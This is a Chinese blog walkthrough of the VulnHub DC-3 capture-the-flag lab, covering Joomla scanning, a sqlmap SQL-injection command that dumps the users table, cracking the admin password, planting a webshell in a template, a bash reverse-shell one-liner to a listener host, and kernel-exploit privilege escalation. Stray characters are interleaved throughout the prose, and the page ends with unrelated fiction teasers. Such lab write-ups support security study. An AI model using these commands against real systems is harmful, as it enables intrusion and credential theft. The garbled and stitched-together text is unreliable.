vulnhub DC-3

信息收集

arp-scan探測位置业栅,nmap去進(jìn)行一個初步的掃描秒咐。發(fā)現(xiàn)他運行在ubuntu上,只開放80端口碘裕,但是按照之前的經(jīng)驗携取,有可能把特殊端口藏起來了,用masscan查一遍全端口娘汞,在信息收集的步驟越詳細(xì)越好歹茶。順序可以是masscan-nmap夕玩,偷懶了==你弦。

我自己寫了一個masscan處理結(jié)果轉(zhuǎn)nmap的腳本,并且將輸出結(jié)果進(jìn)行了格式化燎孟,有需要可以聯(lián)系我禽作,還暫時沒有對其進(jìn)行優(yōu)化,自用而言也沒有打算優(yōu)化了揩页。還有各種開源的腳本但是不太符合我的習(xí)慣旷偿,建議各位可以去github搜索下成熟的開源腳本。

打開80端口發(fā)現(xiàn)他有提示說

image-20200616203004961.png

應(yīng)該是說只有web這一個入口去提權(quán)了爆侣,查看一些版本說明去搜索joomla的詳情工具等萍程。

[FreeBuf] https://www.freebuf.com/sectool/181440.html joomscan掃描工具

kali中自帶該工具,掃描后發(fā)現(xiàn)版本信息后臺信息等兔仰,去根據(jù)版本匹配漏洞發(fā)現(xiàn)3.7.0存在sql注入漏洞茫负,kali利用searchspolit進(jìn)行搜索發(fā)現(xiàn)用sqlmap即可對其進(jìn)行利用,具體的sqlmap利用語句可以用searchspolit進(jìn)行查看乎赴。

image-20200616204323136.png

獲取網(wǎng)站后臺權(quán)限

獲得數(shù)據(jù)庫信息忍法,獲取表信息后去查看表的內(nèi)容。最后的sqlmap語句如下所示:

sqlmap -u "http://192.168.1.16/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --dump -p list[fullordering]

在這個過程中利用了msfconsole的exp失敗榕吼,去github上搜索了下發(fā)現(xiàn)不如用sqlmap查找的方便饿序。

數(shù)據(jù)庫信息

利用john工具嘗試對密碼進(jìn)行破解。

image-20200616212906593.png

得到用戶名密碼羹蚣,admin/snoopy,進(jìn)入網(wǎng)頁后臺原探,這里需要注意網(wǎng)頁后臺的地址在joomscan掃描出來的地方,直接登錄index.php是網(wǎng)站的前臺。

image-20200616212933549.png

獲取普通用戶權(quán)限

進(jìn)入后查找上傳點咽弦,在模板處發(fā)現(xiàn)可以編輯的地方告匠,原本想傳個php小馬,具體webshell請參考:

[GITHUB] https://github.com/tennc/webshell webshell

后來發(fā)現(xiàn)模板路徑之類的很麻煩离唬,于是寫在了index.php中后专。

image-20200616221121154.png

需要注意要找對模板,我寫的是antsword的馬输莺,蟻劍連接成功戚哎。

image-20200616221232793.png

現(xiàn)在為了方便可以起一個nc監(jiān)聽反連過來,具體可以參考文章:

[ctrl_TT豆] https://www.cnblogs.com/-chenxs/p/11748488.html NC反彈shell的幾種方法

單純的使用會因為sh的解析出錯嫂用,可以用bash -c 的方法進(jìn)行繞過

bash -i >& /dev/tcp/192.168.1.17/4444 0>&1
image-20200616223940100.png
bash -c 'bash -i >& /dev/tcp/192.168.1.17/4444 0>&1'

成功獲取shell型凳。

獲取root用戶權(quán)限

嘗試了DC-1與DC-2的方法后,發(fā)現(xiàn)辦法進(jìn)行提權(quán)嘱函,參考臟牛漏洞甘畅,可能需要內(nèi)核漏洞去提權(quán),查看內(nèi)核版本:

lsb_release -a
uname -a
image-20200617211828463.png

查看到是ubuntu16.04/4.4.0版本往弓。

利用searchspolit進(jìn)行查找選擇疏唾,利用4.4.x的漏洞去嘗試提權(quán)

image-20200617212414836.png
image-20200617212434369.png

獲取地址在這里。注意看能否ping通函似,不能需要修改hosts或者dns解析槐脏。

本機(jī)起http.server讓其進(jìn)行下載,下載成功后進(jìn)行解壓縮撇寞,

image-20200617220831227.png
image-20200617221324435.png
image-20200617221355089.png

獲取到root權(quán)限結(jié)束

總結(jié)

對于linux內(nèi)核的提權(quán)還需要進(jìn)行學(xué)習(xí)顿天,原理和利用手法都不是很熟練,還需要加強(qiáng)學(xué)習(xí)蔑担。對于linux內(nèi)核漏洞的選擇還沒有很深刻的認(rèn)識牌废。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市啤握,隨后出現(xiàn)的幾起案子鸟缕,更是在濱河造成了極大的恐慌,老刑警劉巖恨统,帶你破解...
    沈念sama閱讀 211,194評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件叁扫,死亡現(xiàn)場離奇詭異,居然都是意外死亡畜埋,警方通過查閱死者的電腦和手機(jī)莫绣,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,058評論 2 385
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來悠鞍,“玉大人对室,你說我怎么就攤上這事模燥。” “怎么了掩宜?”我有些...
    開封第一講書人閱讀 156,780評論 0 346
  • 文/不壞的土叔 我叫張陵蔫骂,是天一觀的道長。 經(jīng)常有香客問我牺汤,道長辽旋,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,388評論 1 283
  • 正文 為了忘掉前任檐迟,我火速辦了婚禮补胚,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘追迟。我一直安慰自己溶其,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 65,430評論 5 384
  • 文/花漫 我一把揭開白布敦间。 她就那樣靜靜地躺著瓶逃,像睡著了一般。 火紅的嫁衣襯著肌膚如雪廓块。 梳的紋絲不亂的頭發(fā)上厢绝,一...
    開封第一講書人閱讀 49,764評論 1 290
  • 那天,我揣著相機(jī)與錄音剿骨,去河邊找鬼代芜。 笑死埠褪,一個胖子當(dāng)著我的面吹牛浓利,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播钞速,決...
    沈念sama閱讀 38,907評論 3 406
  • 文/蒼蘭香墨 我猛地睜開眼贷掖,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了渴语?” 一聲冷哼從身側(cè)響起苹威,我...
    開封第一講書人閱讀 37,679評論 0 266
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎驾凶,沒想到半個月后牙甫,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,122評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡调违,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,459評論 2 325
  • 正文 我和宋清朗相戀三年窟哺,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片技肩。...
    茶點故事閱讀 38,605評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡且轨,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情旋奢,我是刑警寧澤泳挥,帶...
    沈念sama閱讀 34,270評論 4 329
  • 正文 年R本政府宣布,位于F島的核電站至朗,受9級特大地震影響深员,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜焊刹,卻給世界環(huán)境...
    茶點故事閱讀 39,867評論 3 312
  • 文/蒙蒙 一绿满、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧粤蝎,春花似錦真仲、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,734評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至碑宴,卻和暖如春软啼,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背延柠。 一陣腳步聲響...
    開封第一講書人閱讀 31,961評論 1 265
  • 我被黑心中介騙來泰國打工祸挪, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人贞间。 一個月前我還...
    沈念sama閱讀 46,297評論 2 360
  • 正文 我出身青樓贿条,卻偏偏與公主長得像,于是被迫代替她去往敵國和親增热。 傳聞我的和親對象是個殘疾皇子整以,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 43,472評論 2 348